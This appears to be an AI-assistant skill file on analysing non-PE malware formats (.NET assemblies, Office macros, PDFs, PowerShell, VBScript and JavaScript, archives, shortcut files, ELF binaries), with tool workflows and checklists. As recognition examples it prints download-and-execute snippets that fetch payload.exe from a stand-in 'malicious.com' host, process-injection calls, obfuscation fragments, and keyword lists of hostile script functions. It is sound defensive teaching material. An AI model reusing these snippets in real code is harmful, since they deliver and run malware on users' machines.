specialized-file-analyzer
Specialized File Analyzer
Expert analysis of file formats beyond native Windows PE executables that are commonly used in malware campaigns: .NET assemblies, Office documents, PDFs, scripts, archives, and Linux binaries.
When to Use This Skill
Use this skill when analyzing:
- .NET/C# assemblies (.exe, .dll with .NET framework)
- Office documents with macros (.docm, .xlsm, .doc, .xls)
- PDF files (suspicious attachments, exploit documents)
- Scripts (PowerShell .ps1, VBScript .vbs, JavaScript .js)
- Archives (.zip, .rar, .7z, .tar.gz)
- Shortcuts (.lnk files)
- Linux binaries (ELF executables)
- Batch files (.bat, .cmd)
Key indicator: the file command reports something other than a native PE executable, such as a .NET assembly, document, script, archive, or ELF binary.
Quick File Type Identification
# Identify file type
file sample.bin
# Common outputs:
# "PE32+ console executable, for MS Windows" → Standard PE (use malware-triage)
# "PE32 executable (GUI) Intel 80386 Mono/.Net assembly" → .NET (use this skill)
# "Microsoft Office Document" → Office macro (use this skill)
# "PDF document, version 1.7" → PDF (use this skill)
# "Zip archive data" → Archive (use this skill)
# "ELF 64-bit LSB executable" → Linux binary (use this skill)
# "ASCII text, with CRLF line terminators" → Script (use this skill)
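The same first-pass routing can be approximated in Python by checking magic bytes directly, which helps when the file utility is not available on the analysis host. This is a minimal sketch: the function name sniff_type and the labels are illustrative assumptions, and only a handful of signatures are covered.

```python
# Illustrative sketch: route a sample by its leading magic bytes.
# The labels and the function name are assumptions, not part of any tool.
MAGIC = [
    (b"MZ", "PE (check for .NET metadata before routing)"),
    (b"\x7fELF", "ELF binary"),
    (b"%PDF-", "PDF document"),
    (b"PK\x03\x04", "ZIP container (archive or Office 2007+)"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (legacy Office)"),
    (b"Rar!\x1a\x07", "RAR archive"),
    (b"7z\xbc\xaf\x27\x1c", "7-Zip archive"),
    (b"\x1f\x8b", "gzip stream"),
    (b"L\x00\x00\x00\x01\x14\x02\x00", "Windows shortcut (LNK)"),
]


def sniff_type(data: bytes) -> str:
    """Return a coarse type label based on the first bytes of a file."""
    for magic, label in MAGIC:
        if data.startswith(magic):
            return label
    return "unknown (possibly a script or other text)"
```

Reading only the first 16 bytes of a sample is enough for these signatures, for example sniff_type(open(path, "rb").read(16)).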
.NET / C# Assembly Analysis
Detection
# Check for .NET assembly
file sample.exe | grep "Mono/.Net assembly"
# Or check strings
strings sample.exe | grep "mscoree.dll"
# Check PE header
pe-parser sample.exe | grep "CLR Runtime"
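When no PE parser is at hand, the CLR check can be sketched with the standard library alone. A .NET assembly is a PE file whose data directory entry 14 (the CLR runtime header) is non-empty. The function name has_clr_header is an assumption for illustration, and the sketch does no validation beyond the fields it reads.

```python
import struct


def has_clr_header(data: bytes) -> bool:
    """True if the PE optional header carries a non-empty CLR data directory."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]   # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\x00\x00":
        return False
    opt = pe_off + 24                                   # signature + COFF header
    if len(data) < opt + 2:
        return False
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                                  # PE32
        dirs = opt + 96
    elif magic == 0x20B:                                # PE32+
        dirs = opt + 112
    else:
        return False
    if len(data) < dirs + 15 * 8:
        return False
    count = struct.unpack_from("<I", data, dirs - 4)[0]  # NumberOfRvaAndSizes
    rva, size = struct.unpack_from("<II", data, dirs + 14 * 8)
    return count > 14 and rva != 0 and size != 0
```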
Tool: dnSpy (Windows - Primary Tool)
Download: https://github.com/dnSpy/dnSpy
Workflow:
- Open sample.exe in dnSpy
- Navigate: Assembly Explorer → sample.exe → Namespace → Classes
- Find entry point: Right-click assembly → Go to Entry Point
What to Look For:
Main() Function:
// Entry point - start here
public static void Main(string[] args)
{
// Analyze execution flow
}
Suspicious Namespaces:
- System.Net - Network operations (WebClient, HttpClient)
- System.Security.Cryptography - Encryption/decryption
- System.Reflection - Dynamic code loading
- System.Diagnostics.Process - Process execution
- System.IO - File operations
- Microsoft.Win32 - Registry access
Common Malicious Patterns:
// Download and execute
WebClient wc = new WebClient();
wc.DownloadFile("http://malicious.com/payload.exe", "C:\\temp\\payload.exe");
Process.Start("C:\\temp\\payload.exe");
// Base64 decode embedded payload
byte[] decoded = Convert.FromBase64String(encodedPayload);
// Reflective loading (rawAssembly is a byte[] holding the decoded payload)
Assembly asm = Assembly.Load(rawAssembly);
// Process injection
WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, out lpNumberOfBytesWritten);
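Embedded Base64 payloads of the kind shown above can often be spotted offline in exported decompiled source. The following is a rough sketch, not a complete carver: it scans a byte blob for long Base64 runs and keeps those that decode to an MZ header. The name find_embedded_pe and the 40-character minimum are assumptions chosen for illustration.

```python
import base64
import re

# Runs of at least 40 Base64 characters, optionally followed by padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def find_embedded_pe(blob: bytes):
    """Yield (offset, decoded_bytes) for Base64 runs that decode to an MZ header."""
    for match in B64_RUN.finditer(blob):
        run = match.group(0)
        run = run[: len(run) - len(run) % 4]    # trim to a multiple of 4
        try:
            decoded = base64.b64decode(run, validate=True)
        except ValueError:                      # covers binascii.Error
            continue
        if decoded.startswith(b"MZ"):
            yield match.start(), decoded
```

Each hit can be written to disk and fed back into the file-type identification step.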
Extract Embedded Resources:
Assembly Explorer → Right-click assembly → Resources
Look for:
- Embedded executables (byte arrays)
- Encrypted payloads
- Configuration data
- Icons (may hide data)
Right-click resource → Save
Deobfuscation:
# Using de4dot (automated deobfuscator)
de4dot sample.exe -o sample_deobfuscated.exe
# Handles common obfuscators:
# - ConfuserEx
# - .NET Reactor
# - Eazfuscator
# - Agile.NET
Dynamic Debugging:
dnSpy: Debug → Start Debugging (F5)
Set breakpoints on suspicious functions
Step through execution (F10/F11)
Watch variables and decrypted strings
Tool: ILSpy (Cross-platform Alternative)
# Command-line decompilation
ilspycmd sample.exe -o output_directory/
# GUI version (Windows/Linux/Mac)
ilspy sample.exe
Export decompiled code:
File → Save Code → C# Project
Analysis Checklist - .NET
- Entry point identified (Main function)
- Obfuscation detected and removed (if needed)
- Embedded resources extracted
- Network URLs/IPs extracted
- Crypto keys identified
- Anti-analysis checks found
- Payload execution method documented
- IOCs extracted (URLs, IPs, file paths)
Office Document / Macro Analysis
Detection
# Macro-enabled formats
# .docm, .xlsm, .pptm → Office 2007+ with macros
# .doc, .xls, .ppt → Legacy Office (97-2003) with macros
file document.docm
# Output: "Microsoft Word 2007+"
# Quick macro check (Office 2007+ files are ZIP containers, so this mostly catches the vbaProject.bin entry name)
strings document.docm | grep -i "vba\|macro\|autoopen"
Tool: oledump.py (Primary - Didier Stevens)
Installation:
wget https://didierstevens.com/files/software/oledump_V0_0_70.zip
unzip oledump_V0_0_70.zip
Workflow:
1. List Streams:
python oledump.py document.docm
# Example output:
# 1: 114 '\x01CompObj'
# 2: 4096 '\x05DocumentSummaryInformation'
# 3: M 8192 'Macros/VBA/ThisDocument' ← Macro present (M indicator)
# 4: m 1024 'Macros/VBA/_VBA_PROJECT'
# 5: M 4096 'Macros/VBA/Module1'
2. Extract Macro Code:
# Extract macro from stream 3
python oledump.py -s 3 -v document.docm
# Decompress corrupted VBA
python oledump.py -s 3 --vbadecompresscorrupt document.docm
# Save to file
python oledump.py -s 3 -v document.docm > extracted_macro.vba
3. Analyze Macro Code:
Look for Auto-Execution Functions:
Sub AutoOpen() ' Word - runs on document open
Sub Document_Open() ' Word - runs on document open
Sub Workbook_Open() ' Excel - runs on workbook open
Sub Auto_Open() ' Excel - runs on workbook open
Look for Suspicious VBA Functions:
' Command execution
Shell("cmd.exe /c powershell ...")
CreateObject("WScript.Shell").Run "..."
' File download
CreateObject("MSXML2.XMLHTTP")
URLDownloadToFile ...
' File system operations
CreateObject("Scripting.FileSystemObject")
' Dynamic code execution
ExecuteStatement
Eval()
CallByName()
Tool: olevba (oletools Suite)
Installation:
pip install oletools
Automated Analysis:
# Comprehensive analysis
olevba document.docm
# Decode obfuscated strings
olevba --decode document.docm
# JSON output for parsing
olevba -j document.docm > analysis.json
# Extract IOCs only
olevba --decode document.docm | grep -E "http|https|powershell|cmd|wscript"
Output Interpretation:
- AutoExec - Auto-execution keywords found
- Suspicious - Suspicious VBA keywords
- IOCs - URLs, IPs, file paths
- Hex Strings - Encoded data
- Base64 Strings - Encoded payloads
- Dridex Strings - Dridex malware indicators
Excel 4.0 Macros (XLM Macros)
XLM macros live in worksheet cells rather than in a VBA project, so VBA-focused tooling can miss them.
# Detect XLM macros
python oledump.py document.xls | grep XL
# Extract with XLMMacroDeobfuscator
git clone https://github.com/DissectMalware/XLMMacroDeobfuscator
python XLMMacroDeobfuscator.py -f document.xls
# Or use olevba
olevba document.xls --deobf
Modern Office Documents (.docx, .xlsx) - No Macros
Template Injection Attack:
# Extract Office Open XML structure
unzip document.docx -d extracted/
# Check for external relationships (the attachedTemplate entry normally lives in word/_rels/settings.xml.rels)
grep -r 'TargetMode="External"' extracted/
# Look for:
# <Relationship Type="http://schemas.../attachedTemplate"
# Target="http://malicious.com/template.dotm" TargetMode="External"/>
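The relationship check can also be done without unpacking the document to disk. The sketch below reads every .rels part straight from the ZIP container and reports relationships marked TargetMode="External". The function name external_targets is hypothetical, and untrusted XML should only be parsed inside the analysis environment.

```python
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_targets(path_or_file):
    """Return (part_name, rel_type, target) for every external relationship."""
    found = []
    with zipfile.ZipFile(path_or_file) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found
```

A relationship type ending in attachedTemplate with an http target is the template injection case described above; ordinary hyperlinks also show up as external and need to be judged by their target.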
Embedded Objects:
# Check for embedded files
ls extracted/word/embeddings/
# Analyze embedded objects
file extracted/word/embeddings/*
Analysis Checklist - Office Documents
- Macro presence confirmed
- All macro streams extracted
- Auto-execution functions identified
- Obfuscated strings decoded
- Download URLs extracted
- Payload execution method documented
- External template checked (.docx/.xlsx)
- Embedded objects analyzed
- IOCs extracted and defanged
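For the last checklist item, a small helper can pull URLs out of extracted macro text and defang them before they go into a report. This is a minimal sketch: the regular expression is deliberately simple, and the names defang and extract_urls are assumptions for illustration.

```python
import re

URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)


def defang(ioc: str) -> str:
    """Rewrite a URL or host so it cannot be clicked or auto-linked."""
    out = re.sub(r"^http", "hxxp", ioc, flags=re.IGNORECASE)
    return out.replace(".", "[.]")


def extract_urls(text: str):
    """Return the unique URLs found in text, defanged, in first-seen order."""
    seen = []
    for url in URL_RE.findall(text):
        if url not in seen:
            seen.append(url)
    return [defang(u) for u in seen]
```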
PDF Analysis
Detection
file document.pdf
# Output: "PDF document, version 1.7"
Tool: pdfid.py (Didier Stevens)
Quick Triage:
python pdfid.py document.pdf
# Red flags:
# /OpenAction - Executes action on open
# /AA - Additional actions (auto-execute)
# /JavaScript - Embedded JavaScript
# /JS - JavaScript (short form)
# /Launch - Launch external program
# /EmbeddedFile - Embedded files
# /RichMedia - Flash/multimedia content
# /ObjStm - Object streams (can hide malicious content)
Example Output:
PDFiD 0.2.7 document.pdf
PDF Header: %PDF-1.7
obj 45
endobj 45
stream 12
endstream 12
/Page 5
/Encrypt 0
/ObjStm 0
/JS 3 ← Suspicious!
/JavaScript 2 ← Suspicious!
/AA 1 ← Auto-action present!
/OpenAction 1 ← Executes on open!
/Launch 0
/EmbeddedFile 0
/RichMedia 0
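To make clear what the counts above measure, here is a simplified keyword counter in the spirit of pdfid. It is not pdfid's actual implementation: it undoes #xx hex escapes across the whole file (which also touches stream data) and then counts name tokens. The function name count_keywords is an assumption.

```python
import re

KEYWORDS = ["/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch",
            "/EmbeddedFile", "/RichMedia", "/ObjStm"]


def _decode_hex_escape(match):
    # Turn a #xx escape (for example #61) into the byte it encodes.
    return bytes([int(match.group(1), 16)])


def count_keywords(pdf: bytes) -> dict:
    """Count risky name tokens after undoing #xx hex escapes."""
    normalized = re.sub(rb"#([0-9A-Fa-f]{2})", _decode_hex_escape, pdf)
    counts = {}
    for kw in KEYWORDS:
        # A name ends at a delimiter or whitespace, so /JS must not match /JSfoo.
        pattern = re.escape(kw.encode()) + rb"(?![A-Za-z0-9])"
        counts[kw] = len(re.findall(pattern, normalized))
    return counts
```

Undoing the hex escapes first matters because a name such as /J#61vaScript is equivalent to /JavaScript for a PDF reader.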
Tool: pdf-parser.py (Didier Stevens)
Extract JavaScript:
# Search for JavaScript objects
python pdf-parser.py --search javascript document.pdf
# Extract specific object
python pdf-parser.py --object 15 document.pdf
# Dump JavaScript code
python pdf-parser.py --object 15 --raw document.pdf > extracted_js.txt
# Filter streams
python pdf-parser.py --filter document.pdf
Tool: peepdf (Interactive Analysis)
# Install
pip install peepdf
# Interactive mode
peepdf -i document.pdf
# Commands in interactive shell:
> tree # Show object structure
> object 15 # Inspect object 15
> stream 15 # View stream 15
> javascript # Extract all JavaScript
> extract stream 15 > payload.bin
PDF Exploits
Common CVEs:
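- CVE-2013-2729 - Adobe Reader integer overflow (exploits typically pair it with a JavaScript heap spray)
- CVE-2010-0188 - libtiff integer overflow triggered by a crafted TIFF image
- CVE-2009-0927 - Collab.getIcon() stack buffer overflow (the JBIG2Decode overflow is CVE-2009-0658)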
Shellcode Detection:
# Look for shellcode in streams
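# -a treats binary as text, -P enables \x escapes, LC_ALL=C matches raw bytes, -c counts matching lines
# A lone \xeb (short jmp) byte is too common to be a useful signal on its own
python pdf-parser.py --raw --filter document.pdf | LC_ALL=C grep -caP '\x90{10,}'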
# Extract suspicious streams
python pdf-parser.py --object <id> --raw document.pdf | hexdump -C
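Once a stream has been dumped to a file, the NOP sled check is easy to reproduce in Python, which avoids shell quoting and locale issues. This is a heuristic sketch only: the function name find_nop_sleds and the default minimum length of 16 are assumptions, and real shellcode often uses other padding.

```python
import re


def find_nop_sleds(data: bytes, min_len: int = 16):
    """Return (offset, length) for each run of 0x90 bytes at least min_len long."""
    pattern = re.compile(rb"\x90{%d,}" % min_len)
    return [(m.start(), len(m.group(0))) for m in pattern.finditer(data)]
```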
Analysis Checklist - PDF
- pdfid scan completed (flags identified)
- JavaScript extracted (if present)
- Embedded files extracted
- Auto-action mechanism documented
- Shellcode indicators checked
- CVE exploitation checked (if relevant)
- URLs/IPs extracted from JS
- IOCs documented
PowerShell / Script Analysis
PowerShell (.ps1) Deobfuscation
Common Obfuscation Patterns:
Base64 Encoding:
# Encoded command execution
powershell.exe -EncodedCommand <base64_string>
# Decode manually
$encoded = "Base64StringHere"
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
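The same decode can be done outside PowerShell, which is convenient on a Linux analysis host. The argument to -EncodedCommand is Base64 over UTF-16LE text, so the Python equivalent is short; the function name decode_encoded_command is an illustrative assumption.

```python
import base64


def decode_encoded_command(b64: str) -> str:
    """Decode the argument of powershell.exe -EncodedCommand (Base64 of UTF-16LE)."""
    return base64.b64decode(b64).decode("utf-16-le")
```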
String Concatenation:
$url = "ht" + "tp://" + "evil.com"
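Simple literal concatenation like this can be folded statically before reading the script. The sketch below handles only double-quoted literals joined with +; it does not evaluate variables, format operators, or escape sequences. The name fold_concat is hypothetical.

```python
import re

CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')


def fold_concat(src: str) -> str:
    """Repeatedly merge adjacent "a" + "b" literals into "ab"."""
    prev = None
    while prev != src:
        prev = src
        # A function replacement avoids backslash handling in the literal text.
        src = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src
```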
Compression:
$ms = New-Object IO.MemoryStream
$ms.Write([Convert]::FromBase64String($compressed), 0, $compressedLength)
$ms.Seek(0,0) | Out-Null
$cs = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
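A compressed payload of this shape can be unpacked offline instead of letting the script do it. The sketch assumes the blob is Base64 over either a gzip stream (as with GZipStream above) or raw deflate data (an assumption covering scripts that use DeflateStream instead); the name unpack_payload is illustrative.

```python
import base64
import gzip
import zlib


def unpack_payload(b64: str) -> bytes:
    """Base64-decode a blob, then decompress it as gzip or raw deflate."""
    raw = base64.b64decode(b64)
    if raw[:2] == b"\x1f\x8b":            # gzip magic bytes
        return gzip.decompress(raw)
    return zlib.decompress(raw, -15)      # negative wbits means raw deflate
```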
Tool: PSDecode
# Install
git clone https://github.com/R3MRUM/PSDecode
# Deobfuscate PowerShell
Import-Module .\PSDecode.ps1
PSDecode -InputFile malicious.ps1 -OutputFile decoded.txt
Manual Analysis:
# Read script without executing
Get-Content malicious.ps1
# Search for key indicators
Select-String -Path malicious.ps1 -Pattern "Invoke-Expression|IEX|DownloadString|DownloadFile|FromBase64String"
Suspicious PowerShell Patterns:
- Invoke-Expression / IEX - Execute string as code
- Invoke-WebRequest / Invoke-RestMethod - Download content
- DownloadString / DownloadFile - Download payloads
- FromBase64String - Decode embedded payload
- IO.Compression.GzipStream - Decompress payload
- [Reflection.Assembly]::Load - Load assembly from memory
- -EncodedCommand - Base64 encoded command
- -WindowStyle Hidden - Hide window
- -ExecutionPolicy Bypass - Bypass script execution policy
VBScript (.vbs) Analysis
' Common malicious patterns:
' Command execution
CreateObject("WScript.Shell").Run "cmd.exe /c ..."
' HTTP download
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
objHTTP.Open "GET", "http://malicious.com/payload.exe", False
objHTTP.Send
' File operations
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("C:\payload.exe", True)
' Dynamic execution
Eval(encodedCode)
Execute(decodedPayload)
Analysis:
# Read script
cat malicious.vbs
# Search for patterns
grep -i "CreateObject\|WScript.Shell\|MSXML2.XMLHTTP\|Eval\|Execute" malicious.vbs
# Deobfuscate: Replace Eval() with WScript.Echo() to print instead of execute
JavaScript (.js) Analysis
# Beautify obfuscated JS
js-beautify malicious.js > beautified.js
# Online: https://beautifier.io/
Suspicious Patterns:
// Code execution
eval(encodedCode);
// Decode strings
unescape("%75%6E%65%73%63%61%70%65");
decodeURIComponent("%20");
// ActiveX (Windows COM objects)
var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd.exe /c ...");
// WScript objects
var fso = new ActiveXObject("Scripting.FileSystemObject");
Analysis Checklist - Scripts
- Script type identified (PS1, VBS, JS, BAT)
- Obfuscation detected and removed
- Base64/encoded strings decoded
- Download URLs extracted
- Execution commands documented
- Dropped file paths identified
- IOCs extracted (URLs, IPs, domains)
Archive Analysis
Safe Inspection (No Extraction)
# List contents without extracting
7z l archive.zip
unzip -l archive.zip
tar -tzf archive.tar.gz
rar l archive.rar
# Look for red flags:
# - Double extensions (invoice.pdf.exe)
# - Executable files (.exe, .scr, .com, .bat, .vbs)
# - LNK files (shortcuts)
# - Deeply nested archives (archive.zip -> archive2.zip -> payload.exe)
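The red flags listed above can be checked programmatically for ZIP files without extracting anything. This is a heuristic sketch: the extension sets and the function name triage_zip are assumptions, and any name with more than one suffix before a risky extension is reported as a double extension.

```python
import zipfile
from pathlib import PurePosixPath

RISKY = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".lnk", ".ps1"}
NESTED = {".zip", ".rar", ".7z", ".gz", ".iso"}


def triage_zip(path_or_file):
    """Return (member_name, reason) pairs based on member names only."""
    flags = []
    with zipfile.ZipFile(path_or_file) as zf:
        for info in zf.infolist():
            suffixes = [s.lower() for s in PurePosixPath(info.filename).suffixes]
            if not suffixes:
                continue
            last = suffixes[-1]
            if last in RISKY:
                reason = "double extension" if len(suffixes) > 1 else "executable or script"
                flags.append((info.filename, reason))
            elif last in NESTED:
                flags.append((info.filename, "nested archive"))
    return flags
```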
Extract Safely
# Create isolated directory
mkdir /tmp/extracted_archive
cd /tmp/extracted_archive
# Extract
7z x ../archive.zip
unzip ../archive.zip
tar -xzf ../archive.tar.gz
# Immediately check file types
file *
Password-Protected Archives
Common passwords in malware:
- infected
- malware
- virus
- 2024 / 2025
- 123456
# Extract with password
7z x -pinfected archive.zip
unzip -P infected archive.zip
LNK (Shortcut) File Analysis
Tool: LECmd (Windows)
# Download from: https://ericzimmerman.github.io/
LECmd.exe -f malicious.lnk
Tool: lnkinfo (Linux)
lnkinfo malicious.lnk
# Look for:
# - Target path (what it executes)
# - Command-line arguments
# - Working directory
# - Icon location (may reveal payload location)
Manual Strings Analysis:
strings malicious.lnk | grep -E "\.exe|\.dll|http|powershell|cmd"
Analysis Checklist - Archives
- Contents listed without extraction
- File extensions verified (no double extensions)
- Files extracted to isolated directory
- All extracted files typed (file command)
- LNK files analyzed (if present)
- Nested archives checked
- Password documented (if applicable)
Linux / ELF Binary Analysis
Detection
file sample.bin
# Output: "ELF 64-bit LSB executable, x86-64"
Static Analysis
ELF Header:
readelf -h sample.bin
# Shows:
# - Architecture (x86, x86-64, ARM)
# - Entry point address
# - Program header offset
# - Section header offset
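The fields readelf reports sit at fixed offsets in the first bytes of the file, so they can be read directly when binutils is unavailable. This is a minimal sketch covering only the fields listed above; the function name parse_elf_header and the small machine table are assumptions.

```python
import struct

MACHINES = {0x03: "x86", 0x3E: "x86-64", 0x28: "ARM", 0xB7: "AArch64", 0x08: "MIPS"}


def parse_elf_header(data: bytes) -> dict:
    """Extract class, machine, entry point and table offsets from an ELF header."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2                      # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if data[5] == 1 else ">"    # EI_DATA: 1 = little, 2 = big
    e_type, e_machine, _version = struct.unpack_from(endian + "HHI", data, 16)
    fmt = endian + ("QQQ" if is64 else "III")
    e_entry, e_phoff, e_shoff = struct.unpack_from(fmt, data, 24)
    return {
        "bits": 64 if is64 else 32,
        "type": e_type,
        "machine": MACHINES.get(e_machine, hex(e_machine)),
        "entry": e_entry,
        "phoff": e_phoff,
        "shoff": e_shoff,
    }
```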
Sections:
readelf -S sample.bin
# Look for suspicious sections:
# - High entropy sections (encrypted/packed)
# - Unusual section names
# - RWX sections (read-write-execute)
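readelf does not report entropy, so the high-entropy check needs a separate calculation over each section's bytes. A Shannon entropy helper is enough for a first pass; values close to 8 bits per byte suggest compressed or encrypted data. The function name shannon_entropy is illustrative, and any threshold applied to the result is a judgment call rather than a fixed rule.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())
```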
Imported Libraries:
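# Do not run ldd on untrusted samples: it can end up executing code from the binary
readelf -d sample.bin | grep -E "NEEDED|RPATH|RUNPATH"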
# Look for:
# - libssl.so (crypto/network)
# - libc.so (standard)
# - Unusual paths (/tmp/lib.so)
Imported Symbols:
nm -D sample.bin
objdump -T sample.bin
# Search for suspicious functions:
nm -D sample.bin | grep -E "socket|connect|fork|exec|ptrace|system"
Strings:
strings -a sample.bin | grep -E "http|/tmp|/etc|passwd"
Dynamic Analysis (Linux)
strace - System Call Monitoring:
# Monitor all system calls
strace -f ./sample.bin 2>&1 | tee strace_output.txt
# Monitor specific calls
strace -e trace=network,file,process ./sample.bin
# File operations only
strace -e trace=open,openat,read,write,close ./sample.bin
# Network operations only (on x86-64, send/recv are implemented as sendto/recvfrom)
strace -e trace=socket,connect,sendto,recvfrom ./sample.bin
ltrace - Library Call Monitoring:
ltrace -f ./sample.bin 2>&1 | tee ltrace_output.txt
Check for Packing:
# UPX detection (UPX-packed ELF files usually have no section headers, so search for the UPX! marker instead)
strings -a sample.bin | grep "UPX!"
# Unpack UPX
upx -d sample.bin -o sample_unpacked.bin
Analysis Checklist - ELF
- Architecture identified (x86/x64/ARM)
- Imported libraries documented
- Suspicious functions identified
- Packing detected and removed (if UPX)
- Strings extracted and analyzed
- System calls monitored (strace)
- Network activity captured
- File operations documented
Integration with Report Writing
Each file type contributes specific sections to the malware analysis report:
.NET Analysis →
- Decompiled code snippets
- Embedded resource descriptions
- Obfuscation techniques used
- Reflective loading mechanisms
Office Macros →
- Macro code (sanitized)
- Auto-execution methods
- Download URLs
- Payload dropping process
PDF Analysis →
- Embedded JavaScript
- Auto-action triggers
- Exploit CVEs (if applicable)
- Shellcode presence
Scripts →
- Deobfuscated code
- Execution flow
- Download cradles
- C2 communications
Archives/LNK →
- Archive structure
- Masquerading techniques
- LNK target analysis
- Social engineering aspects
ELF Binaries →
- System calls used
- Network protocols
- Persistence mechanisms (cron, systemd)
- Rootkit indicators
Tool Quick Reference
| File Type | Primary Tool | Secondary Tool |
|---|---|---|
| .NET | dnSpy | ILSpy, de4dot |
| Office Macros | oledump.py | olevba, XLMMacroDeobfuscator |
| PDF | pdfid.py, pdf-parser.py | peepdf |
| PowerShell | PSDecode | Manual analysis |
| VBScript/JS | Text editor + analysis | js-beautify |
| Archives | 7z, unzip, tar | - |
| LNK | LECmd (Win), lnkinfo (Linux) | strings |
| ELF | readelf, nm, objdump | strace, ltrace |
Best Practices
Do:
- Always identify file type first (file command)
- Extract in isolated environments
- Document obfuscation techniques
- Save original and deobfuscated versions
- Test extracted IOCs for accuracy
- Cross-reference with VirusTotal/MalwareBazaar
Don't:
- Execute scripts without understanding them first
- Trust file extensions (check magic bytes)
- Skip deobfuscation steps
- Extract archives directly to important directories
- Assume password-protected = safe
Example Usage
User request: "I have a suspicious .docm file with macros, help me analyze it"
Workflow:
- Confirm file type (Office document)
- Use oledump.py to list streams
- Extract VBA macro code
- Identify auto-execution functions
- Decode obfuscated strings
- Extract download URLs and IOCs
- Document payload delivery method
- Prepare findings for report
Source
https://github.com/gl0bal01/malware-analysis-claude-skills/blob/main/specialized-file-analyzer/SKILL.md
Overview
Specialized-file-analyzer provides expert analysis of non-PE formats used in malware campaigns, including .NET assemblies, Office macros, PDFs, scripts, archives, and Linux ELF binaries. It guides analysts when standard PE-focused tools miss format-specific artifacts, indicators, and payloads.
How This Skill Works
The skill identifies non-PE formats using system tools (file command) and then applies format-specific techniques (dnSpy/ILSpy for .NET, macro/script inspection, PDF analysis, archive exploration, and ELF examination). It highlights entry points, suspicious namespaces, embedded resources, and obfuscated payloads, and supports deobfuscation and dynamic debugging to uncover malicious behavior.
When to Use It
- .NET/C# assemblies (.exe, .dll)
- Office documents with macros (.docm, .xlsm, .doc, .xls)
- PDF files with potential exploits
- Scripts (PowerShell .ps1, VBScript .vbs, JavaScript .js)
- Linux ELF binaries
Quick Start
- Step 1: Identify the file type using file sample.bin
- Step 2: Open and inspect with the appropriate tool (dnSpy/ILSpy for .NET; macros/scripts/PDF tools for others)
- Step 3: Review entry points and patterns; extract resources, deobfuscate with de4dot, and perform targeted debugging
Best Practices
- Validate file type with the file command to confirm non-PE formats
- Use dnSpy or ILSpy to inspect .NET assemblies and locate the entry point
- Scan for suspicious namespaces and patterns (System.Net, Reflection, Process.Start, etc.)
- Inspect embedded resources and hidden payloads; extract when found
- Apply deobfuscation (de4dot) and perform targeted dynamic debugging in dnSpy
Example Use Cases
- A .NET assembly that downloads and executes a payload from the Internet
- A Word/Excel macro document that downloads a payload and writes to disk
- A PDF document built to exploit a reader vulnerability through malformed content
- PowerShell or JavaScript embedded in a document or script file with obfuscated strings
- An ELF binary hidden inside an archive with obfuscated strings and custom loader